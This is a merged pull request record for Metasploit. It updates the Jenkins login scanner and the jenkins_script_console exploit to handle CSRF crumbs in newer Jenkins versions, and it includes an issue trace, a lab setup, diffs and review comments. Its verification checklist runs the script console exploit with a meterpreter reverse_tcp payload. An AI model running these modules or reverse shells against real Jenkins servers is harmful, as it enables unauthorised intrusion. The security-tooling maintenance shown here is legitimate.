### PR TITLE
Update jenkins login scanner to work with newer versions

### LINKED ISSUE #17977: Jenkins login scanner doesn't work with newer versions
## Steps to reproduce

Run and set up jenkins in docker:

  1. Run `docker run -p 8080:8080 -p 50000:50000 jenkins/jenkins:latest`
  1. Extract the Administrator password:
     1. Extract the container id with `docker ps`
     2. Extract the password with `docker exec $containerIdHere /bin/bash -c 'cat /var/jenkins_home/secrets/initialAdminPassword'`
  1. Visit `http://127.0.0.1:8080`
  1. Use the default setup and install "suggested plugins"

Run the Metasploit module with http tracing shows failure for a valid password

```
msf6 auxiliary(scanner/http/jenkins_login) > run rhost=127.0.0.1 rport=8080 username=admin password=password httptrace=true

####################
# Request:
####################
POST /j_acegi_security_check HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 36

j_username=admin&j_password=password
####################
# Response:
####################
HTTP/1.1 403 Forbidden
X-Content-Type-Options: nosniff
Cache-Control: must-revalidate,no-cache,no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 562
Server: Jetty(10.0.15)

<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=ISO-8859-1"/>
<title>Error 403 No valid crumb was included in the request</title>
</head>
<body><h2>HTTP ERROR 403 No valid crumb was included in the request</h2>
<table>
<tr><th>URI:</th><td>/j_acegi_security_check</td></tr>
<tr><th>STATUS:</th><td>403</td></tr>
<tr><th>MESSAGE:</th><td>No valid crumb was included in the request</td></tr>
<tr><th>SERVLET:</th><td>Stapler</td></tr>
</table>
<hr/><a href="https://eclipse.org/jetty">Powered by Jetty:// 10.0.15</a><hr/>

</body>
</html>

[!] No active DB -- Credential data will not be saved!
[-] 127.0.0.1:8080 - LOGIN FAILED: admin:password (Incorrect)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

## Expected behavior

Auth works

## Current behavior

CSRF failure, and false negative

### Metasploit version

```
msf6 auxiliary(scanner/http/jenkins_login) > version
Framework: 6.3.8-dev-9c8bc4e124
Console  : 6.3.8-dev-9c8bc4e124
```

### PR DESCRIPTION
**Pull request by cgranleese-r7**
This PR fixes #17977.

This PR updates Jenkins modules to work with newer versions, previously they fell over with a CSRF failure, and false negative.

Tested against Jenkins versions:
- 2.411 🟢 
- 2.410 🟢 
- 2.409 🟢 
- 2.401.1  🟢 
- 2.346.3 🟢 
-  2.103 🟢 
- 1.565 🟢 

Note: on `1.565` you need to go to [Configure Global Security](http://127.0.0.1:8080/configureSecurity/) then enable the below settings, then sign up:
image

## Before
image

## After
image

## Target setup
First you'll need a target setup. I followed the setup outlined here:

Run and set up jenkins in docker:

  1. Run `docker run -p 8080:8080 -p 50000:50000 jenkins/jenkins:latest`
  1. Extract the Administrator password:
     1. Extract the container id with `docker ps`
     2. Extract the password with `docker exec $containerIdHere /bin/bash -c 'cat /var/jenkins_home/secrets/initialAdminPassword'`
  1. Visit `http://127.0.0.1:8080`
  1. Use the default setup and install "suggested plugins"

## Verification `jenkins_login`
- [ ] Start `msfconsole`
- [ ] `use scanner/http/jenkins_login`
- [ ]  Run `run rhost=127.0.0.1 rport=8080 username=admin password=<Listed when setting up Docker container>`
- [ ] **Verify** the module now completes successfully

## Verification `jenkins_script_console`
- [ ] `use modules/exploits/multi/http/jenkins_script_console.rb`
- [ ] `run http://admin:<Listed when setting up Docker container>@<LHOST>:8080/ lhost=<LHOST> target=Linux payload=linux/x86/meterpreter/reverse_tcp`
- [ ] **Verify** the module now completes successfully

### CODE REVIEW

File: lib/msf/core/exploit/remote/http/jenkins.rb [hunk 1]
```diff
@@ -0,0 +1,57 @@
...
+          # otherwise it will fail gracefully
+          #
+          # @param [Sting] target_uri The targets URI
+          # @return [Hash] URI for successful login, Cookie that's needed by newer versions
+          def jenkins_uri_check(target_uri, keep_cookie: nil)
+            uri_path = normalize_uri(target_uri.path)
+            uri_path << '/' if uri_path[-1, 1] != '/'
+
+            # get that first cookie that's needed by newer versions
+            res = send_request_cgi({ 'uri' => normalize_uri(uri_path, 'login'), 'keep_cookies' => true })
```
Comment (smcintyre-r7) [inline lib/msf/core/exploit/remote/http/jenkins.rb:21]: Should 'keep_cookies' here be using the value of `keep_cookie`?

File: lib/msf/core/exploit/remote/http/jenkins.rb [hunk 2]
```diff
@@ -0,0 +1,57 @@
...
+            if res.body =~ /action="(j_([a-z0-9_]+))"/
+              uri = Regexp.last_match(1)
+            else
+              fail_with(Msf::Module::Failure::UnexpectedReply, 'Failed to identify the login resource.')
+            end
+
+            { uri: uri, cookie: cookie }.delete_if { |_k, v| v.nil? }
+          end
+
+          # This method takes a target URI and attempts to login to Jenkins and will either fail with appropriate errors
```
Comment (smcintyre-r7) [inline lib/msf/core/exploit/remote/http/jenkins.rb:33]: Would you mind please adding the starting and ending versions of Jenkins that you tested this with? That'll help in the future when the upstream makes another breaking change.

**Review by smcintyre-r7 — COMMENTED** [review]
Would you mind also testing what would happen when this targets a Jenkins server that uses SSO for login? If it's not supported, identifying that and reporting to the user that you can't continue would be reasonable but we want to make sure that it's not going to either yield false positives, or crash with a stack trace.

File: modules/exploits/multi/http/jenkins_script_console.rb [hunk 3]
```diff
@@ -100,10 +106,28 @@ def http_send_command(cmd, _opts = {})
...
+
+  # This method takes a command and options then attempts to make a request to send the command
+  #
+  # @param [String] cmd The cmd used
+  # @param [String] _opts Request options
+  # @return [Rex::Proto::Http::Response] res The response of the request
+  def http_send_command(cmd, _opts = {})
+    res = http_send_request(cmd)
+
+    if res.code == 401
```
Comment (dwelch-r7) [inline modules/exploits/multi/http/jenkins_script_console.rb:120]: res could be null here, you're not checking it until `!(res && (res.code == 200))` further on down

File: modules/exploits/multi/http/jenkins_script_console.rb [hunk 4]
```diff
@@ -139,7 +163,17 @@ def execute_command(cmd, _opts = {})
     http_send_command(cmd.to_s)
   end
 
+  # This method makes calls to multiple methods to handle Jenkins login attempts
+  #
+  # @return [Array] [status, proof] The result of the login attempt
+  def attempt_jenkins_login
```
Comment (dwelch-r7) [inline modules/exploits/multi/http/jenkins_script_console.rb:169]: `attempt_jenkins_login` seems like a bit of a weird name, I would expect something with `attempt` in the name to do some error handling and checking for me? but as it stands `jenkins_uri_check` has a fail with and I don't see any checks here or in the caller as to whether the login was successful or not

**Comment by dwelch-r7** [comment]
# Release Notes

This PR updates Jenkins modules to work with newer versions, previously they fell over with a CSRF failure, and false negative.

**Pull request merged**